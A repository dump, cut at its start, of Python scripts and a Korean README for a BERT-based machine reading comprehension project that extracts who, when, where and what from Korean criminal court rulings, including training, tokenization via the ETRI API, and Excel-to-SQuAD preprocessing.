= {}\n\tfor (i, tok_index) in tok_ns_to_s_map.items():\n\t\ttok_s_to_ns_map[tok_index] = i\n\n\torig_start_position = None\n\tif start_position in tok_s_to_ns_map:\n\t\tns_start_position = tok_s_to_ns_map[start_position]\n\t\tif ns_start_position in orig_ns_to_s_map:\n\t\t\torig_start_position = orig_ns_to_s_map[ns_start_position]\n\n\tif orig_start_position is None:\n\t\tif verbose_logging:\n\t\t\tlogger.info(\"Couldn't map start position\")\n\t\treturn orig_text\n\n\torig_end_position = None\n\tif end_position in tok_s_to_ns_map:\n\t\tns_end_position = tok_s_to_ns_map[end_position]\n\t\tif ns_end_position in orig_ns_to_s_map:\n\t\t\torig_end_position = orig_ns_to_s_map[ns_end_position]\n\n\tif orig_end_position is None:\n\t\tif verbose_logging:\n\t\t\tlogger.info(\"Couldn't map end position\")\n\t\treturn orig_text\n\n\toutput_text = orig_text[orig_start_position:(orig_end_position + 1)]\n\treturn output_text\n\n\ndef _get_best_indexes(logits, n_best_size):\n\t\"\"\"Get the n-best logits from a list.\"\"\"\n\tindex_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)\n\n\tbest_indexes = []\n\tfor i in range(len(index_and_score)):\n\t\tif i >= n_best_size:\n\t\t\tbreak\n\t\tbest_indexes.append(index_and_score[i][0])\n\treturn best_indexes\n\n\ndef _compute_softmax(scores):\n\t\"\"\"Compute softmax probability over raw logits.\"\"\"\n\tif not scores:\n\t\treturn []\n\n\tmax_score = None\n\tfor score in scores:\n\t\tif max_score is None or score > max_score:\n\t\t\tmax_score = score\n\n\texp_scores = []\n\ttotal_sum = 0.0\n\tfor score in scores:\n\t\tx = math.exp(score - max_score)\n\t\texp_scores.append(x)\n\t\ttotal_sum += x\n\n\tprobs = []\n\tfor score in exp_scores:\n\t\tprobs.append(score / total_sum)\n\treturn probs\n\ndef warmup_linear(x, warmup=0.002):\n\tif x < warmup:\n\t\treturn x/warmup\n\treturn 1.0 - x\n\n\ndef parser_add_argument\t( parser ) :\n\t## Required parameters\n\tparser.add_argument(\"--bert_model\", default=\"..\", type=str, required=True,\n\t\t\t\t\t\thelp=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n\t\t\t\t\t\t\"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \"\n\t\t\t\t\t\t\"bert-base-multilingual-cased, bert-base-chinese.\")\n\t# junho. Use tokenized file which include original sentence and tokenized sentence instead of openapi key\n\tparser.add_argument('--tokenized_file',\n\t\t\t\t\t\ttype=str, required=True, default=\"../../data/tokenizing.json\",\n\t\t\t\t\t\thelp=\"Tokenizing file\")\n\n\n\t## Other parameters\n\tparser.add_argument(\"--openapi_key\", default=\"key\", type=str, help=\"OpenAPI key information for morphology analysis\")\n\tparser.add_argument(\"--bert_model_file\", default=\"pytorch_model.bin\", type=str, help=\"specific model file (i.e. pytorch_model.bin)\")\n\tparser.add_argument(\"--vocab_file\", default=\"vocab.korean_morp.list\", type=str, help=\"specific vocab file (i.e. vocab.txt)\")\n\tparser.add_argument(\"--output_dir\", default=\"../../outputDir/EtriBERT\", type=str,\n\t\t\t\t\t\thelp=\"The output directory where the model checkpoints and predictions will be written.\")\n\n\tparser.add_argument(\"--train_file\", default=\"../../data/train.json\", type=str, help=\"SQuAD json for training. E.g., train-v1.1.json\")\n\tparser.add_argument(\"--predict_file\", default=\"../../data/test.json\", type=str,\n\t\t\t\t\t\thelp=\"SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json\")\n\tparser.add_argument(\"--eval_folder\", default=None, type=str, help=\"SQuAD json folder for test performance\")\n\tparser.add_argument(\"--max_seq_length\", default=512, type=int,\n\t\t\t\t\t\thelp=\"The maximum total input sequence length after WordPiece tokenization. Sequences \"\n\t\t\t\t\t\t\t \"longer than this will be truncated, and sequences shorter than this will be padded.\")\n\tparser.add_argument(\"--doc_stride\", default=128, type=int,\n\t\t\t\t\t\thelp=\"When splitting up a long document into chunks, how much stride to take between chunks.\")\n\tparser.add_argument(\"--max_query_length\", default=128, type=int,\n\t\t\t\t\t\thelp=\"The maximum number of tokens for the question. Questions longer than this will \"\n\t\t\t\t\t\t\t \"be truncated to this length.\")\n\tparser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\")\n\tparser.add_argument(\"--do_predict\", action='store_true', help=\"Whether to run eval on the dev set.\")\n\tparser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\")\n\tparser.add_argument(\"--predict_batch_size\", default=4, type=int, help=\"Total batch size for predictions.\")\n\tparser.add_argument(\"--learning_rate\", default=3e-5, type=float, help=\"The initial learning rate for Adam.\")\n\tparser.add_argument(\"--num_train_epochs\", default=2.0, type=float,\n\t\t\t\t\t\thelp=\"Total number of training epochs to perform.\")\n\tparser.add_argument(\"--warmup_proportion\", default=0.1, type=float,\n\t\t\t\t\t\thelp=\"Proportion of training to perform linear learning rate warmup for. E.g., 0.1 = 10% \"\n\t\t\t\t\t\t\t \"of training.\")\n\tparser.add_argument(\"--n_best_size\", default=20, type=int,\n\t\t\t\t\t\thelp=\"The total number of n-best predictions to generate in the nbest_predictions.json \"\n\t\t\t\t\t\t\t \"output file.\")\n\tparser.add_argument(\"--max_answer_length\", default=30, type=int,\n\t\t\t\t\t\thelp=\"The maximum length of an answer that can be generated. This is needed because the start \"\n\t\t\t\t\t\t\t \"and end predictions are not conditioned on one another.\")\n\tparser.add_argument(\"--verbose_logging\", action='store_true',\n\t\t\t\t\t\thelp=\"If true, all of the warnings related to data processing will be printed. \"\n\t\t\t\t\t\t\t \"A number of warnings are expected for a normal SQuAD evaluation.\")\n\tparser.add_argument(\"--no_cuda\",\n\t\t\t\t\t\taction='store_true',\n\t\t\t\t\t\thelp=\"Whether not to use CUDA when available\")\n\tparser.add_argument('--seed',\n\t\t\t\t\t\ttype=int,\n\t\t\t\t\t\tdefault=42,\n\t\t\t\t\t\thelp=\"random seed for initialization\")\n\tparser.add_argument('--gradient_accumulation_steps',\n\t\t\t\t\t\ttype=int,\n\t\t\t\t\t\tdefault=1,\n\t\t\t\t\t\thelp=\"Number of updates steps to accumulate before performing a backward/update pass.\")\n\tparser.add_argument(\"--do_lower_case\",\n\t\t\t\t\t\taction='store_true',\n\t\t\t\t\t\thelp=\"Whether to lower case the input text. True for uncased models, False for cased models.\")\n\tparser.add_argument(\"--local_rank\",\n\t\t\t\t\t\ttype=int,\n\t\t\t\t\t\tdefault=-1,\n\t\t\t\t\t\thelp=\"local_rank for distributed training on gpus\")\n\tparser.add_argument('--fp16',\n\t\t\t\t\t\taction='store_true',\n\t\t\t\t\t\thelp=\"Whether to use 16-bit float precision instead of 32-bit\")\n\tparser.add_argument('--loss_scale',\n\t\t\t\t\t\ttype=float, default=0,\n\t\t\t\t\t\thelp=\"Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\\n\"\n\t\t\t\t\t\t\t \"0 (default value): dynamic loss scaling.\\n\"\n\t\t\t\t\t\t\t \"Positive power of 2: static loss scaling value.\\n\")\n\tparser.add_argument('--gpu_id',\n\t\t\t\t\t\ttype=str, default=\"6\",\n\t\t\t\t\t\thelp=\"GPU ID\")\n\n\treturn parser\n\t\ndef main():\n\n\tparser = argparse.ArgumentParser()\n\tparser = parser_add_argument( parser )\n\targs = parser.parse_args()\n\n\tos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n\tos.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_id\n\n\tif args.local_rank == -1 or args.no_cuda:\n\t\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n\t\tn_gpu = torch.cuda.device_count()\n\telse:\n\t\ttorch.cuda.set_device(args.local_rank)\n\t\tdevice = torch.device(\"cuda\", args.local_rank)\n\t\tn_gpu = 1\n\t\t# Initializes the distributed backend which will take care of sychronizing nodes/GPUs\n\t\ttorch.distributed.init_process_group(backend='nccl')\n\tlogger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format(\n\t\tdevice, n_gpu, bool(args.local_rank != -1), args.fp16))\n\n\tif args.gradient_accumulation_steps < 1:\n\t\traise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(\n\t\t\t\t\t\t\targs.gradient_accumulation_steps))\n\n\n\targs.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)\n\n\tprint(\"SEED : \", args.seed)\n\trandom.seed(args.seed)\n\tnp.random.seed(args.seed)\n\ttorch.manual_seed(args.seed)\n\tif n_gpu > 0:\n\t\ttorch.cuda.manual_seed_all(args.seed)\n\n\tif not args.do_train and not args.do_predict :\n\t\traise ValueError(\"At least one of `do_train` or `do_predict` must be True.\")\n\n\tif args.do_train:\n\t\tif not args.train_file:\n\t\t\traise ValueError(\n\t\t\t\t\"If `do_train` is True, then `train_file` must be specified.\")\n\tif args.do_predict:\n\t\tif not args.predict_file:\n\t\t\traise ValueError(\n\t\t\t\t\"If `do_predict` is True, then `predict_file` must be specified.\")\n\t# junho @ check if tokenized file exists\n\tif not os.path.isfile(args.tokenized_file) :\n\t\traise ValueError(\n\t\t\t\"`tokenized file` must exist\")\n\n\tif args.do_train :\n\t\tif os.path.exists(args.output_dir) and os.listdir(args.output_dir) :\n\t\t\tlogger.error(\"Output directory () already exists and is not empty.\")\n\t\tos.makedirs(args.output_dir, exist_ok=True)\n\n\ttokenizer_path = args.bert_model\n\tif args.vocab_file != None :\n\t\ttokenizer_path = os.path.join(args.bert_model, args.vocab_file)\n\n\ttokenizer = BertTokenizer.from_pretrained(str(tokenizer_path), do_lower_case=False)\n\n\t# junho @ load tokenized file.\n\twith open(args.tokenized_file, \"r\", encoding='utf-8') as reader:\n\t\tTokenizingDict = json.load(reader)\n\n\ttrain_examples = None\n\tnum_train_steps = None\n\tif args.do_train:\n\t\t#########################################\n\t\t### joonho.lim @ 2019-03-15\n\t\ttrain_examples = read_squad_examples_and_do_lang( input_file=args.train_file, is_training=True, Tokenizing = TokenizingDict )\n\t\tnum_train_steps = int(len(train_examples) / args.train_batch_size / args.gradient_accumulation_steps * args.num_train_epochs)\n\n\t\t# joonho.lim - for small-size sample training\n\t\tif num_train_steps == 0 :\n\t\t\tnum_train_steps = 1\n\n\t# Prepare model\n\tstate_dict = None\n\tif args.bert_model_file != None :\n\t\tstate_dict = torch.load( os.path.join(args.bert_model, args.bert_model_file) )\n\tmodel = BertForQuestionAnswering.from_pretrained(args.bert_model, state_dict=state_dict,\n\t\t\t\tcache_dir=PYTORCH_PRETRAINED_BERT_CACHE / 'distributed_{}'.format(args.local_rank))\n\n\tif args.fp16:\n\t\tmodel.half()\n\tmodel.to(device)\n\tif args.local_rank != -1:\n\t\ttry:\n\t\t\tfrom apex.parallel import DistributedDataParallel as DDP\n\t\texcept ImportError:\n\t\t\traise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n\n\t\tmodel = DDP(model)\n\telif n_gpu > 1:\n\t\tmodel = torch.nn.DataParallel(model)\n\n\t# Prepare optimizer\n\tparam_optimizer = list(model.named_parameters())\n\n\t# hack to remove pooler, which is not used\n\t# thus it produce None grad that break apex\n\tparam_optimizer = [n for n in param_optimizer if 'pooler' not in n[0]]\n\n\tno_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n\toptimizer_grouped_parameters = [\n\t\t{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n\t\t{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n\t\t]\n\n\tt_total = num_train_steps\n\tif args.local_rank != -1:\n\t\tt_total = t_total // torch.distributed.get_world_size()\n\tif args.fp16:\n\t\ttry:\n\t\t\tfrom apex.optimizers import FP16_Optimizer\n\t\t\tfrom apex.optimizers import FusedAdam\n\t\texcept ImportError:\n\t\t\traise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n\n\t\toptimizer = FusedAdam(optimizer_grouped_parameters,\n\t\t\t\t\t\t\t lr=args.learning_rate,\n\t\t\t\t\t\t\t bias_correction=False,\n\t\t\t\t\t\t\t max_grad_norm=1.0)\n\t\tif args.loss_scale == 0:\n\t\t\toptimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)\n\t\telse:\n\t\t\toptimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)\n\telse:\n\t\toptimizer = BertAdam(optimizer_grouped_parameters,\n\t\t\t\t\t\t\t lr=args.learning_rate,\n\t\t\t\t\t\t\t warmup=args.warmup_proportion,\n\t\t\t\t\t\t\t t_total=t_total)\n\n\tglobal_step = 0\n\tif args.do_train:\n\t\tcached_train_features_file = args.train_file+'_{0}_{1}_{2}_{3}'.format(\n\t\t\tlist(filter(None, args.bert_model.split('/'))).pop(), str(args.max_seq_length), str(args.doc_stride), str(args.max_query_length))\n\t\ttrain_features = None\n\t\ttry:\n\t\t\twith open(cached_train_features_file, \"rb\") as reader:\n\t\t\t\ttrain_features = pickle.load(reader)\n\t\texcept:\n\t\t\ttrain_features = convert_examples_to_features(\n\t\t\t\texamples=train_examples,\n\t\t\t\ttokenizer=tokenizer,\n\t\t\t\tmax_seq_length=args.max_seq_length,\n\t\t\t\tdoc_stride=args.doc_stride,\n\t\t\t\tmax_query_length=args.max_query_length,\n\t\t\t\tis_training=True)\n\t\t\tif args.local_rank == -1 or torch.distributed.get_rank() == 0:\n\t\t\t\tlogger.info(\" Saving train features into cached file %s\", cached_train_features_file)\n\t\t\t\twith open(cached_train_features_file, \"wb\") as writer:\n\t\t\t\t\tpickle.dump(train_features, writer)\n\t\tlogger.info(\"***** Training *****\")\n\t\tlogger.info(\" Num orig examples = %d\", len(train_examples))\n\t\tlogger.info(\" Num split examples = %d\", len(train_features))\n\t\tlogger.info(\" Batch size = %d\", args.train_batch_size)\n\t\tlogger.info(\" Num steps = %d\", num_train_steps)\n\t\tall_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long)\n\t\tall_start_positions = torch.tensor([f.start_position for f in train_features], dtype=torch.long)\n\t\tall_end_positions = torch.tensor([f.end_position for f in train_features], dtype=torch.long)\n\t\ttrain_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids,\n\t\t\t\t\t\t\t\t all_start_positions, all_end_positions)\n\t\tif args.local_rank == -1:\n\t\t\ttrain_sampler = RandomSampler(train_data)\n\t\telse:\n\t\t\ttrain_sampler = DistributedSampler(train_data)\n\t\ttrain_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)\n\n\tmodel.train()\n\tfor epoch_i in trange(int(args.num_train_epochs), desc=\"Epoch\"):\n\t\tfor step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n\t\t\tif n_gpu == 1:\n\t\t\t\tbatch = tuple(t.to(device) for t in batch) # multi-gpu does scattering it-self\n\t\t\tinput_ids, input_mask, segment_ids, start_positions, end_positions = batch\n\t\t\tloss = model(input_ids, segment_ids, input_mask, start_positions, end_positions)\n\t\t\tif n_gpu > 1:\n\t\t\t\tloss = loss.mean() # mean() to average on multi-gpu.\n\t\t\tif args.gradient_accumulation_steps > 1:\n\t\t\t\tloss = loss / args.gradient_accumulation_steps\n\n\t\t\tif args.fp16:\n\t\t\t\toptimizer.backward(loss)\n\t\t\telse:\n\t\t\t\tloss.backward()\n\t\t\tif (step + 1) % args.gradient_accumulation_steps == 0:\n\t\t\t\t# modify learning rate with special warm up BERT uses\n\t\t\t\tlr_this_step = args.learning_rate * warmup_linear(global_step/t_total, args.warmup_proportion)\n\t\t\t\tfor param_group in optimizer.param_groups:\n\t\t\t\t\tparam_group['lr'] = lr_this_step\n\t\t\t\toptimizer.step()\n\t\t\t\toptimizer.zero_grad()\n\t\t\t\tglobal_step += 1\n\n\t# Save a trained model\n\tmodel_to_save = model.module if hasattr(model, 'module') else model # Only save the model it-self\n\toutput_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\")\n\tif args.do_train:\n\t\ttorch.save(model_to_save.state_dict(), output_model_file)\n\n\t# Load a trained model that you have fine-tuned\n\tmodel_state_dict = torch.load(output_model_file)\n\tmodel = BertForQuestionAnswering.from_pretrained(args.bert_model, state_dict=model_state_dict)\n\tmodel.to(device)\n\t\t\n\tif args.do_predict and (args.local_rank == -1 or torch.distributed.get_rank() == 0):\n\t\t#########################################\n\t\t### joonho.lim @ 2019-03-15\n\t\teval_examples = read_squad_examples_and_do_lang( input_file=args.predict_file, is_training=False , Tokenizing = TokenizingDict)\n\t\teval_features = convert_examples_to_features(\n\t\t\texamples=eval_examples,\n\t\t\ttokenizer=tokenizer,\n\t\t\tmax_seq_length=args.max_seq_length,\n\t\t\tdoc_stride=args.doc_stride,\n\t\t\tmax_query_length=args.max_query_length,\n\t\t\tis_training=False)\n\n\t\tlogger.info(\"***** Running predictions *****\")\n\t\tlogger.info(\" Num orig examples = %d\", len(eval_examples))\n\t\tlogger.info(\" Num split examples = %d\", len(eval_features))\n\t\tlogger.info(\" Batch size = %d\", args.predict_batch_size)\n\n\t\tall_input_ids = torch.tensor([f.input_ids for f in eval_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in eval_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in eval_features], dtype=torch.long)\n\t\tall_example_index = torch.arange(all_input_ids.size(0), dtype=torch.long)\n\t\teval_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_example_index)\n\t\t# Run prediction for full data\n\t\teval_sampler = SequentialSampler(eval_data)\n\t\teval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.predict_batch_size)\n\n\t\tmodel.eval()\n\t\tall_results = []\n\t\tlogger.info(\"Start evaluating\")\n\t\tfor input_ids, input_mask, segment_ids, example_indices in tqdm(eval_dataloader, desc=\"Evaluating\"):\n\t\t\tif len(all_results) % 1000 == 0:\n\t\t\t\tlogger.info(\"Processing example: %d\" % (len(all_results)))\n\t\t\tinput_ids = input_ids.to(device)\n\t\t\tinput_mask = input_mask.to(device)\n\t\t\tsegment_ids = segment_ids.to(device)\n\t\t\twith torch.no_grad():\n\t\t\t\tbatch_start_logits, batch_end_logits = model(input_ids, segment_ids, input_mask)\n\t\t\tfor i, example_index in enumerate(example_indices):\n\t\t\t\tstart_logits = batch_start_logits[i].detach().cpu().tolist()\n\t\t\t\tend_logits = batch_end_logits[i].detach().cpu().tolist()\n\t\t\t\teval_feature = eval_features[example_index.item()]\n\t\t\t\tunique_id = int(eval_feature.unique_id)\n\t\t\t\tall_results.append(RawResult(unique_id=unique_id,\n\t\t\t\t\t\t\t\t\t\t\t start_logits=start_logits,\n\t\t\t\t\t\t\t\t\t\t\t end_logits=end_logits))\n\t\toutput_prediction_file = os.path.join(args.output_dir, \"predictions.json\")\n\t\toutput_nbest_file = os.path.join(args.output_dir, \"nbest_predictions.json\")\n\t\tpreds = write_predictions(eval_examples, eval_features, all_results,\n\t\t\t\t\t\t args.n_best_size, args.max_answer_length,\n\t\t\t\t\t\t args.do_lower_case, output_prediction_file,\n\t\t\t\t\t\t output_nbest_file, args.verbose_logging)\n\ndef evaluate() :\n\n\tparser = argparse.ArgumentParser()\n\tparser = parser_add_argument(parser)\n\targs = parser.parse_args()\n\n\toutput_prediction_file = os.path.join(args.output_dir, \"predictions.json\")\n\toutput_true_file = args.predict_file\n\n\n\toutput_null_log_odds_file = None\n\n\tevaluate_options = EVAL_OPTS(data_file=args.predict_file,\n\t\t\t\t\t\t\t\t pred_file=output_prediction_file,\n\t\t\t\t\t\t\t\t na_prob_file=output_null_log_odds_file)\n\tresults = evaluate_on_squad(evaluate_options)\n\n\n\twith open(os.path.join(args.output_dir, \"result.txt\"), \"w\") as fp :\n\t\tfp.write(json.dumps(results))\n\n\nif __name__ == \"__main__\":\n\tmain()\n\tevaluate()\n"
},
{
"alpha_fraction": 0.6417666077613831,
"alphanum_fraction": 0.6483097076416016,
"avg_line_length": 31.192981719970703,
"blob_id": "ea06fefa76a776f98f391ce802e9ea970791bc00",
"content_id": "4679933722d896040340e4e33780f22d01e94eb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1914,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 57,
"path": "/EtriBERT/runningcode/tokenizing.py",
"repo_name": "junho-one/AILaw",
"src_encoding": "UTF-8",
"text": "import argparse\nimport json\nimport urllib3\nfrom tqdm import tqdm\n\ndef parser_add_argument\t( parser ) :\n\n ## Required parameters\n parser.add_argument(\"--openapi_key\", default=\"key\", type=str, required=True, help=\"OpenAPI key information for morphology analysis\")\n ## Other parameters\n parser.add_argument(\"--input_file\", default=\"../../data/law.json\", type=str, help=\"all file that include train file and test file\")\n parser.add_argument('--output_file', type=str, default=\"../../data/tokenizing.json\", help=\"Tokenizing file\")\n\n return parser\n\ndef do_lang(openapi_key, text):\n openApiURL = \"http://aiopen.etri.re.kr:8000/WiseNLU\"\n\n requestJson = {\"access_key\": openapi_key, \"argument\": {\"text\": text, \"analysis_code\": \"morp\"}}\n\n http = urllib3.PoolManager()\n response = http.request(\"POST\", openApiURL, headers={\"Content-Type\": \"application/json; charset=UTF-8\"},\n body=json.dumps(requestJson))\n\n return response.data.decode()\n\n\ndef main() :\n parser = argparse.ArgumentParser()\n parser = parser_add_argument(parser)\n args = parser.parse_args()\n\n APIkey = args.openapi_key\n # predefined question list\n questionList = [\"피해자가 누구인가요?\", \"범행이 언제 발생했나요?\", \"범행이 어디서 발생했나요?\", \"어떤 범행이 발생했나요?\"]\n\n with open(args.input_file) as json_file:\n json_data = json.load(json_file)\n\n num = 0\n Tokenized = {}\n\n for ques in questionList :\n Tokenized[ques] = do_lang(APIkey, ques)\n\n for paragraphs_title in tqdm(json_data['data']) :\n num += 1\n Tokenized[paragraphs_title['paragraphs'][0]['context']] = [do_lang(APIkey, paragraphs_title['paragraphs'][0]['context'])]\n\n with open(args.output_file, \"w\") as writer:\n writer.write(json.dumps(Tokenized, indent=4, ensure_ascii=False) + \"\\n\")\n\n\n\n\nif __name__ == \"__main__\":\n\tmain()"
},
{
"alpha_fraction": 0.5614818930625916,
"alphanum_fraction": 0.5664739608764648,
"avg_line_length": 24.046052932739258,
"blob_id": "49b9b8f109d39ed2ce1b813ae1323e192b3d5904",
"content_id": "280036354dfc46b101ae0f374b63d771c1843698",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3818,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 152,
"path": "/data-processing/preprocess.py",
"repo_name": "junho-one/AILaw",
"src_encoding": "UTF-8",
"text": "# convert excel to json\n\nimport xlrd\nimport json\nimport copy\nimport random\nimport argparse\nimport os\n\ndef load_data(fn) :\n wb=xlrd.open_workbook(fn)\n ws=wb.sheet_by_index(0)\n\n nrow = ws.nrows\n ncol = ws.ncols\n print(\"> Read excel file\")\n print(\"row num :\",nrow)\n print(\"col num :\",ncol)\n\n return ws\n\ndef convertExcelToJson (excel, to_all) :\n questionList = [excel.cell_value(0, i) for i in range(excel.ncols)]\n qNum = {}\n\n for i in range(len(questionList)):\n if \"?\" in questionList[i]:\n qNum[i] = 0\n\n article = []\n answer = []\n\n dataList = []\n datatmp = {}\n\n paragraphList = []\n paragraphtmp = {}\n\n qasList = []\n qastmp = {}\n\n ansList = []\n anstmp = {}\n\n id = 0\n for row in range(2, excel.nrows):\n article.append(len(excel.cell_value(row, 2)))\n\n for col in range(3, excel.ncols, 2):\n if len(excel.cell_value(row, col)) > 0:\n qNum[col] += 1\n\n text = excel.cell_value(row, col)\n startNum = excel.cell_value(row, col + 1)\n\n anstmp['answer_start'] = startNum\n anstmp['text'] = text\n ansList.append(anstmp)\n anstmp = {}\n\n answer.append(len(text))\n\n qastmp['question'] = questionList[col]\n qastmp['answers'] = ansList\n qastmp['id'] = str(id)\n\n qasList.append(qastmp)\n\n ansList = []\n qastmp = {}\n id = id + 1\n\n paragraphtmp['context'] = excel.cell_value(row, 2).strip()\n paragraphtmp['qas'] = qasList\n\n paragraphList.append(paragraphtmp)\n qasList = []\n paragraphtmp = {}\n\n datatmp['title'] = excel.cell_value(row, 0).strip()\n datatmp['paragraphs'] = paragraphList\n dataList.append(copy.deepcopy(datatmp))\n\n paragraphList = []\n\n print(\"\\n총 데이터(context) 개수 :\", len(dataList))\n\n random.shuffle(dataList)\n\n lawdict = {}\n lawdict['data'] = dataList\n\n for idx, count in qNum.items() :\n print(questionList[idx] + \" : \" + str(count))\n\n with open(to_all, \"w\", encoding=\"utf-8\") as make_file:\n json.dump(lawdict, make_file, ensure_ascii=False, indent=\"\\t\")\n\n return lawdict\n\ndef train_test_split(lawdict, to_trn, to_tst) :\n\n length = len(lawdict['data'])\n train_length = int(length * 0.7)\n\n train = {}\n trainList = []\n\n test = {}\n testList = []\n\n for i in range(train_length):\n trainList.append(lawdict['data'][i])\n\n for i in range(train_length, length):\n testList.append(lawdict['data'][i])\n\n print(\"\\n> Train-Test-Split\")\n print(\" Train :\", len(trainList), \"Test :\", len(testList))\n\n train['data'] = trainList\n test['data'] = testList\n\n with open(to_trn, \"w\", encoding=\"utf-8\") as make_file:\n json.dump(train, make_file, ensure_ascii=False, indent=\"\\t\")\n\n with open(to_tst, \"w\", encoding=\"utf-8\") as make_file:\n json.dump(test, make_file, ensure_ascii=False, indent=\"\\t\")\n\n\ndef parser_add_argument\t( parser ) :\n parser.add_argument(\"--input_file\", default=\"../data/law.xlsx\", type=str, help=\"KorCL excel file\")\n parser.add_argument(\"--output_dir\", default=\"../data/\", type=str, help=\"KorCL json file\")\n\n return parser\n\ndef main() :\n\n parser = argparse.ArgumentParser()\n parser = parser_add_argument(parser)\n args = parser.parse_args()\n\n train_fn = os.path.join( args.output_dir, \"train.json\" )\n test_fn = os.path.join( args.output_dir, \"test.json\")\n all_fn = os.path.join( args.output_dir, \"law.json\" )\n\n law_excel = load_data(args.input_file)\n law_dict = convertExcelToJson(law_excel, all_fn)\n train_test_split(law_dict, train_fn, test_fn)\n\nif __name__ == \"__main__\" :\n main()"
},
{
"alpha_fraction": 0.6736252307891846,
"alphanum_fraction": 0.699592649936676,
"avg_line_length": 25.01324462890625,
"blob_id": "b45ba8ede4be31f57ef2fcfb05e9b5105e91aca0",
"content_id": "f6a554632db57566a863514bf3ffb01267ac64cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5862,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 151,
"path": "/README.md",
"repo_name": "junho-one/AILaw",
"src_encoding": "UTF-8",
"text": "# AI law ([Paper](https://www.cseric.or.kr/literature/ser_view.php?))\n\n판례 내에 있는 핵심 정보를 추출하는 인공지능 모델을 BERT를 이용하여 구현했고, 학습에 필요한 데이터셋을 정의하였다.<br/>\n본 프로젝트에서 정의한 핵심 정보란 아래와 같다\n* \"누가 범죄를 저질렀는지\"\n* \"언제 범죄를 저질렀는지\"\n* \"어디서 범죄를 저질렀는지\"\n* \"어떤 범죄를 저질렀는지\"\n\n정보를 추출하기 위해 기계독해 방식으로 문제에 접근하였고, 학습 데이터셋을 SQuAD 형식에 맞춰 태깅하였다.<br/>\n판례 내에 있는 \"범죄 사실\"이라는 사건의 경위를 담고 있는 단락을 **context**로 하고,\n추출하고자 하는 핵심 정보를 **question과 answer**을 통해 태깅했다.\n\n\nEtri의 KorBERT와 구글의 Multilingual BERT를 사용하여 성능을 비교해봤고,<br/>\n결과적으로 형태소 분석을 수행한 뒤 KorBERT를 통해 학습시키는 방법이 대부분의 상황에서 좋은 성능을 냈다.\n\n\n\n## Dependencies\n* torch>=1.7.0\n* transformers>=4.0.0\n* scikit-learn\n* selenium\n* xlrd\n* xlsxwriter\n\n\n\n## Dataset\n\n\n<p align=\"center\">\n <img src=\"./image/dataEx.PNG\" alt=\"text\" width=\"number\" />\n</p>\n\n----\n\n\nKorCL 데이터 셋을 구축하기 위해 법률정보통합검색 사이트인‘리걸서치’에서 성범죄 관련 판례 677건, 살인 관련 판례 46건, 폭행 관련 판례 278건으로 총 1,001건을 수집하였다. \n1,001건의 판례에 대한 질문으로는 WHO에 대한 질문 1,001개, WHEN에 대한 질문 975개, WHERE에 대한 질문 908개, WHAT에 대한 질문 1,001개로 총 3,885개의 질의응답쌍을 구축하였다\n\n\n## How to Use\n\n### - Crawler\n`python3 crawler/run_crawler.py`를 통해 [리걸서치 사이트](https://legalsearch.kr/)에서 판례 데이터를 크롤링할 수 있다.\n\n현재 코드는 리걸서치에서 수집하고자 하는 키워드를 검색하였을 때, 검색되는 판례들만을 크롤링하도록 되어 있다. **만약, 다른 유형의 판례들도 수집하고 싶다면 main 함수의 `keywords` 리스트에 검색할 키워드를 입력하여 코드를 실행하면 된다.**\n\n<br/>\n\n### - Model\n\n### 1. preprocess data\n\n```\npython3 preprocess.py \n--input_file ../data/law.xlsx\n--output_dir ../data/\n```\n\ndata-processing 폴더 안에 있는 preprocess.py 실행시 excel 파일을 squad 데이터 형식의 데이터셋으로 변환된다.\n\n* train.json : 70% data\n* test.json : 30% data\n* law.json : 100% data\n\n\n### 2. multilingual-BERT\n\n``` \npython3 run_squad.py \n--model_type bert \n--model_name_or_path bert-base-multilingual-uncased \n--do_train \n--do_lower \n--do_eval \n--train_file ../../data/train.json \n--predict_file ../../data/test.json \n--per_gpu_train_batch_size 12 \n--learning_rate 3e-5 \n--num_train_epochs 2.0 \n--max_seq_length 384 \n--doc_stride 128 